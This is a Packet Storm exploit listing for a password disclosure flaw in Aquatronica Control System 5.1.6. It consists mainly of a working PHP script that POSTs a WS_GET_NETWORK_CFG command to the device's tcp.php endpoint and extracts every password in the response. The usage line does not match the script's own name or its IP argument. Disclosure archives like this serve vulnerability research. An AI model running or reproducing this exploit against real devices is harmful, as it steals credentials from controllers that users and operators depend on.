exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Aquatronica Control System 5.1.6 Hash Disclosure

Aquatronica Control System 5.1.6 Hash Disclosure
Posted Sep 27, 2024
Authored by indoushka

Aquatronica Control System version 5.1.6 suffers from a hash disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | f97e8496dea3f74570e81811208c8ab73c042ae1f3e28024e2d731482de127db

Aquatronica Control System 5.1.6 Hash Disclosure

Change Mirror Download
=============================================================================================================================================
| # Title : Aquatronica Control System 5.1.6 Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |
| # Vendor : https://www.aquatronica.com |
=============================================================================================================================================

poc :

[+] Leak passwords in Aquatronica Control System v 5.1.6 has a tcp.php endpoint

[+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload :

<?php

// التأكد من توافر الوسائط المطلوبة
if ($argc != 2) {
echo "Usage: php aqua.php\n";
exit(1);
}

$ip = $argv[1];
$program = "TCP";
$command = "ws_get_network_cfg";
$function_id = "TCP_XML_REQUEST";


// إنشاء عنوان URL لنقطة النهاية tcp.php
$url = "http://$ip/" . strtolower($program) . ".php";

// البيانات التي سيتم إرسالها في الطلب POST
$post_data = [
'function_id' => strtolower($function_id),
'command' => strtoupper($command)
];

// إرسال الطلب باستخدام cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
// فك تشفير النصوص والإشارة المرجعية
$decoded_response = urldecode($response);
$final_response = htmlspecialchars_decode($decoded_response);

// البحث عن كلمات المرور باستخدام التعبيرات النمطية
preg_match_all('/pwd="([^"]+)"/', $final_response, $matches);

if (!empty($matches[1])) {
foreach ($matches[1] as $password) {
echo " $password\n";
sleep(1); // تأخير زمني بين الكلمات
}
} else {
echo "No passwords found.\n";
}
} else {
echo "Dry season! HTTP Code: $http_code\n";
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close